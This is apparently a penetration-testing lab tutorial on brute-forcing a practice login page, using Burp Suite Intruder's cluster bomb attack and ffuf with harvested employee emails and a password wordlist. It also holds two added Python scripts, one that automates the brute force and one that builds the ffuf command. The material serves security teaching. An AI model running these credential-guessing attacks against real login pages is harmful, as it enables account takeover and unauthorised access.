
Brute Forcing Login Pages

Setup #

In order to complete this lab, you will use a program called ffuf on your virtual machine.

To install ffuf:


# Update your apt repository
sudo apt update

# Install ffuf
sudo apt install ffuf

In a real penetration test engagement, you would have access to extensive wordlists and may even compile your own. For this exercise, I’ve included two wordlists. One is short, for use with Burpsuite (whose free edition throttles Intruder); the second is longer, for use with ffuf. You can download the files manually via the browser or with wget/curl.

Longer List

Shorter List

# Using wget
# Longer list
wget https://astar.fyi/files/custom_wordlist.txt -O custom_wordlist.txt
# Shorter list
wget https://astar.fyi/files/custom_wordlist_short.txt -O custom_wordlist_short.txt

# Using curl
# Longer list
curl -o custom_wordlist.txt https://astar.fyi/files/custom_wordlist.txt
# Shorter list
curl -o custom_wordlist_short.txt https://astar.fyi/files/custom_wordlist_short.txt

Brute Forcing a Login Page with Burpsuite #

Inside your virtual machine, start burpsuite.

A “Temporary project in memory” is fine; click Next.

burp_temp_project.png

Check “Use Burp defaults” and click “Start Burp”.

burp_use_defaults.png

Once Burpsuite starts, click the “Proxy” tab, and then the “HTTP history” tab under it.

burp_proxy_HTTP_History.png

You can now open Firefox and visit https://lab2.astarml.com

astarml_home.png

Once the page loads, turn on FoxyProxy by clicking the FoxyProxy extension icon and selecting “http”. Clicking outside of the extension window closes it.

foxy_proxy_http.png

Now when you refresh the page, you should see traffic appearing in the HTTP history tab.

astarml_http_history.png

To clean up the history a bit, right click on the row with Host = “https://lab2.astarml.com” and URL = “/” and click “Add to scope”.

http_history_add_to_scope.png

Click Yes in the pop up. This ensures that only requests to “https://lab2.astarml.com” are logged.

http_history_only_log_in_scope.png

Now that logging is set up properly, we need to enumerate the website to identify useful information. Scrolling down the page, we find employee information, including their email addresses.

contact_cards.png

Copy each email address into a text file on your virtual machine and save it as emails.txt. Put each email on its own line with no commas or trailing spaces, since each line is sent verbatim as a payload.

[email protected]
[email protected]
[email protected]
[email protected]

emails_txt_file.png

Navigate to the login page. It uses an email and password combination.

login_page.png

We need to capture a login attempt, so try to log in with any data, for example [email protected] and passwrd.

astarml_failed_log.png

This obviously doesn’t work; however, the POST request now appears in the HTTP history in Burpsuite.

http_history_failed_attempt.png

Right click on the request and select “Send to Intruder”

http_history_send_to_intruder.png

Now navigate to the Intruder Tab

intruder_tab.png

Change the attack type from “Sniper attack” to “Cluster bomb attack”. This lets us specify multiple payload positions and tries every combination of the payload sets: with four emails and a list of N passwords, Intruder sends 4 × N requests. Alternatively, we could leave it on sniper, specify only a password list, and manually change the email between attacks.

intruder_change_to_cluster_bomb.png

To specify a payload position, highlight the value (inside the quotation marks).

payload_highlight.png

Then click the “Add” button at the top. This wraps the value in the payload markers.

payload_add_button.png
payload_symbol_email.png

Repeat this for the password value.

payload_symbol_password.png

Now in the payload side of the screen, select the first payload position; this is the email. Leaving the payload type on “Simple list”, paste your email list into the payload list by copying it from your terminal and then clicking “Paste” in the “Payload Configuration” section.

payload_list_email.png

Make sure to uncheck the “URL-encode these characters” option in the Payload Encoding section. The request body is JSON, not a form, so URL-encoding would turn the @ in each email into %40 and the server would never see a valid address.

uncheck_payload_encoding.png

We can now switch Payload Position to the second payload.

payload_position_password.png

Leave “Simple list” selected, but this time click “Load…” instead of “Paste”. In the file explorer window that opens, navigate to where you saved the shorter custom wordlist, select it, and click “Open”.

payload_load.png

All the potential passwords are now loaded into your payload list.

payload_password_loaded.png

Again, uncheck the payload encoding option.

uncheck_payload_encoding.png

Now, when you click “Start Attack”, Intruder runs through every combination of email and password. In the free Community Edition of Burpsuite the attack is rate-limited and Burp warns you about that. Click “OK” to continue.

intruder_start_attack.png

You’ll see requests start to be made. Most of them return status code 401, as the credentials are rejected.

cluster_bomb_401s.png

Look for a request that returned status code 200; that was the successful authentication attempt. The status code alone is a heuristic, so also compare the response Length column: the successful login will usually have a different size than the failed attempts, which lets you spot it even on applications that answer 200 to a failed login.

cluster_bomb_success.png

NOTE: Burpsuite is INCREDIBLY slow in its free version. Find the instructions for a faster CLI-based tool below.

Now that we have valid credentials, we can return to the application in the web browser and log in manually with them.

login_success.png

We now reach a dashboard page with a terminal that we will use in the password cracking exercise.

astarml_dashboard_page.png
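The cluster bomb attack Intruder runs above, written out as a small Python script so the mechanics are visible. This is an added example, not part of the original lab: it tries every email against every password, caps the request rate, and records the pairs that match a rule (by default “status is 200”, as on the page). The endpoint and JSON body shape are taken from the page; FakeLoginServer and its credentials are constructed so the script can run offline.

```python
"""Cluster-bomb login brute force (added example, not the lab's own code).

Mirrors Burp Intruder's cluster bomb attack from the lab: every email in
emails.txt is tried against every password in the wordlist. LOGIN_URL and the
{"email","password"} body come from the page; FakeLoginServer is constructed.
"""
import itertools
import json
import time
import urllib.error
import urllib.request

LOGIN_URL = "https://lab2.astarml.com/api/login"  # from the page


def http_post_json(url, body, timeout=10.0):
    """Real transport: POST a JSON body and return (status, response bytes).
    urllib raises on 4xx/5xx, but a 401 is a normal result here, so catch it."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        method="POST",
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def status_is_200(status, body):
    """Match rule used on the page: a 200 means the login succeeded."""
    return status == 200


def cluster_bomb(emails, passwords, send=None, rate=5.0, match=status_is_200):
    """Try every (email, password) pair in order, at most `rate` requests per
    second (rate <= 0 disables the delay). `send(body)` must return
    (status, bytes) and defaults to a real POST to LOGIN_URL.
    Returns [(email, password, status, response_length), ...] for matches."""
    if send is None:
        def send(body):
            return http_post_json(LOGIN_URL, body)
    delay = 1.0 / rate if rate > 0 else 0.0
    hits = []
    for email, password in itertools.product(emails, passwords):
        status, body = send({"email": email, "password": password})
        if match(status, body):
            hits.append((email, password, status, len(body)))
        if delay:
            time.sleep(delay)
    return hits


class FakeLoginServer:
    """Constructed stand-in for the lab endpoint (offline only): 200 with a
    token for the one valid pair, 401 for everything else, the same shape of
    result the lab shows in Intruder."""

    VALID = {"alice@example.com": "Winter2024!"}  # constructed, not the lab's

    def __init__(self):
        self.requests = 0

    def __call__(self, body):
        self.requests += 1
        if self.VALID.get(body.get("email")) == body.get("password"):
            return 200, b'{"token":"constructed"}'
        return 401, b'{"error":"invalid credentials"}'


def read_list(path):
    """One entry per line, blank lines dropped (emails.txt, custom_wordlist.txt)."""
    with open(path, encoding="utf-8") as fh:
        return [line.strip() for line in fh if line.strip()]


if __name__ == "__main__":
    # Against the real lab, using the files from the Setup section.
    for email, password, status, length in cluster_bomb(
        read_list("emails.txt"), read_list("custom_wordlist.txt"), rate=5
    ):
        print(f"{status} len={length} {email}:{password}")
```

The `match` argument is the point worth keeping: matching on status alone is exactly what the Intruder walkthrough does, but an application that answers 200 to a failed login needs a rule on the body or its length instead, for example `match=lambda s, b: b"token" in b`.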

Brute Forcing using FFUF #

ffuf is a fast web fuzzer that lets us automate the brute-forcing of our login request. It is significantly faster than the free edition of Burpsuite.

For this exercise you can turn off the FoxyProxy extension, as we won’t need it.

To capture the request, navigate to the login page, open the Firefox developer tools and click the “Network” tab.

devtools_network_tab.png

Now make a login attempt in the browser so we have something to copy. You should see the request in Dev Tools.

devtools_invalid_request.png

Right click on the request in Dev Tools and choose “Copy Value” > “Copy as cURL”.

devtool_copy_curl_.png

Paste this into a text editor so we can work with the values easily.

cURL_request_notepad.png

Now we can build our ffuf command. Start by stripping out unneeded information: the browser’s copy includes headers such as User-Agent, Accept and Cookie plus the --compressed flag, none of which the API needs.

The only header we have to keep is “Content-Type”, since the body is JSON:

curl 'https://lab2.astarml.com/api/login' \
  -X POST \
  -H 'Content-Type: application/json' \
  --data-raw '{"email":"[email protected]","password":"test"}'

We’ll now use this data to build the ffuf command. Each -w takes a wordlist and a keyword (here PASS and EMAIL) that ffuf substitutes wherever it appears in the URL, headers or body. With two keyworded wordlists ffuf defaults to cluster bomb mode, so it tries every email against every password, just like Intruder. -mc 200 shows only responses with status 200 and -rate 5 caps the attack at five requests per second.

# Command Template
ffuf -w <wordlist 1>:<variable name> -w <wordlist 2>:<variable name> -u <request url> -X <method> -H <header> -d <request body> -mc <status code to match> -rate <number of requests per second>

# Actual Command
ffuf -w ./custom_wordlist.txt:PASS -w ./emails.txt:EMAIL -u 'https://lab2.astarml.com/api/login' -X POST -H 'content-type: application/json' -d '{"email":"EMAIL","password":"PASS"}' -mc 200 -rate 5
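The two steps above (strip the browser’s cURL down to what the API needs, then turn it into the ffuf command) done mechanically, as an added Python example that is not part of the original lab or of ffuf itself. `parse_curl` handles the option shapes Firefox emits, `build_ffuf_command` keeps only Content-Type, swaps the email and password values for the EMAIL and PASS keywords and assembles the same command shown above. SAMPLE_CURL is constructed to look like browser output: the URL is the lab’s, the header values and the test email are made up.

```python
"""Build the ffuf command from a devtools 'Copy as cURL' line.

Added example, not the lab's code. Assumes the login request is a JSON body
with "email" and "password" fields, as on the page. SAMPLE_CURL is constructed.
"""
import json
import shlex

# Value-taking curl options we deliberately drop (cookies, UA, referer).
_DROP_WITH_VALUE = {"-b", "--cookie", "-A", "--user-agent", "-e", "--referer"}


def parse_curl(curl_text):
    """Return {"url", "method", "headers", "body"} from a curl command line.
    Header names are lower-cased so lookups don't depend on browser casing."""
    # Firefox joins lines with a trailing backslash; turn those into spaces
    # before shlex sees them, otherwise the backslash escapes the newline.
    tokens = shlex.split(curl_text.replace("\\\n", " "))
    if not tokens or tokens[0] != "curl":
        raise ValueError("expected text starting with 'curl'")
    req = {"url": None, "method": "GET", "headers": {}, "body": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-X", "--request"):
            req["method"] = tokens[i + 1].upper()
            i += 2
        elif tok in ("-H", "--header"):
            name, _, value = tokens[i + 1].partition(":")
            req["headers"][name.strip().lower()] = value.strip()
            i += 2
        elif tok in ("-d", "--data", "--data-raw", "--data-binary"):
            req["body"] = tokens[i + 1]
            if req["method"] == "GET":
                req["method"] = "POST"  # curl itself switches to POST with a body
            i += 2
        elif tok in _DROP_WITH_VALUE:
            i += 2
        elif tok.startswith("-"):
            i += 1  # bare flags such as --compressed
        else:
            req["url"] = tok
            i += 1
    if req["url"] is None:
        raise ValueError("no URL found in curl command")
    return req


def build_ffuf_command(req, email_list="./emails.txt",
                       pass_list="./custom_wordlist.txt", match_code=200, rate=5):
    """Assemble the ffuf cluster-bomb command: two wordlists bound to the EMAIL
    and PASS keywords, only the Content-Type header, and the JSON body with
    the two values replaced by the keywords."""
    ctype = req["headers"].get("content-type", "")
    if "json" not in ctype:
        raise ValueError("expected a JSON login request, got Content-Type %r" % ctype)
    body = json.loads(req["body"])
    for key in ("email", "password"):
        if key not in body:
            raise ValueError("login body has no %r field" % key)
    body["email"], body["password"] = "EMAIL", "PASS"
    args = [
        "ffuf",
        "-w", "%s:PASS" % pass_list,
        "-w", "%s:EMAIL" % email_list,
        "-u", req["url"],
        "-X", req["method"],
        "-H", "Content-Type: %s" % ctype,
        "-d", json.dumps(body, separators=(",", ":")),
        "-mc", str(match_code),
        "-rate", str(rate),
    ]
    return shlex.join(args)  # quoted so it can be pasted straight into a shell


# Constructed to resemble Firefox's "Copy as cURL" output for the lab request.
SAMPLE_CURL = r"""curl 'https://lab2.astarml.com/api/login' \
  --compressed \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0' \
  -H 'Accept: */*' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://lab2.astarml.com' \
  --data-raw '{"email":"test@example.com","password":"test"}'"""

if __name__ == "__main__":
    print(build_ffuf_command(parse_curl(SAMPLE_CURL)))
```

Running it prints the same ffuf command as above (with the capitalised Content-Type header, which the API does not care about). Rebuilding the body from parsed JSON rather than string-replacing the values is deliberate: it keeps the quoting intact whatever the test email and password were, which is the same reason URL-encoding had to be switched off in Intruder.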

After some time, ffuf prints the matching combination (the one response with status 200) in the terminal.

ffuf_match.png

We can now use these credentials to log into the website and reach the dashboard page.

astarml_dashboard_page.png